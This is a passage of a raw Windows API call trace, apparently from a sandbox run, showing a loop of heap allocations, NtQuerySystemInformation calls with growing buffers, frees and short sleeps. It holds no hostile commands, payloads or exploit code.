(HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0302.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0302.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.692] Sleep (dwMilliseconds=0x110) [0302.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0302.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0302.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0302.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0302.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0302.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0302.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0302.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0302.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.705] Sleep (dwMilliseconds=0x110) [0302.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0302.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0302.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0302.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0302.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0302.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0302.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0302.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0302.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.718] Sleep (dwMilliseconds=0x110) [0302.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0302.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0302.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0302.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0302.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0302.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0302.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0302.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0302.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.737] Sleep (dwMilliseconds=0x110) [0302.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0302.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0302.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0302.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0302.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0302.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0302.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0302.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0302.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.752] Sleep (dwMilliseconds=0x110) [0302.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0302.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0302.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0302.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0302.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0302.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0302.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0302.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0302.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.768] Sleep (dwMilliseconds=0x110) [0302.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0302.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0302.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0302.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0302.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0302.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0302.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0302.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0302.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.784] Sleep (dwMilliseconds=0x110) [0302.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0302.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0302.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0302.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0302.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0302.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0302.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0302.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0302.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.804] Sleep (dwMilliseconds=0x110) [0302.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0302.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0302.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0302.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0302.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0302.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0302.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.834] Sleep (dwMilliseconds=0x110) [0302.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0302.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0302.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0302.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0302.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0302.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0302.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0302.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0302.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.846] Sleep (dwMilliseconds=0x110) [0302.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0302.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0302.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0302.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0302.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0302.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0302.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0302.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0302.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.908] Sleep (dwMilliseconds=0x110) [0302.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0302.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0302.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0302.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0302.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0302.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0302.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0302.927] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0302.928] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.928] Sleep (dwMilliseconds=0x110) [0302.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0302.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0302.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0302.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0302.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0302.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0302.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0302.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0302.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.942] Sleep (dwMilliseconds=0x110) [0302.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0302.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0302.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0302.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0302.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0302.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0302.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0302.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0302.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.954] Sleep (dwMilliseconds=0x110) [0302.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0302.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0302.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0302.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0302.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0302.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 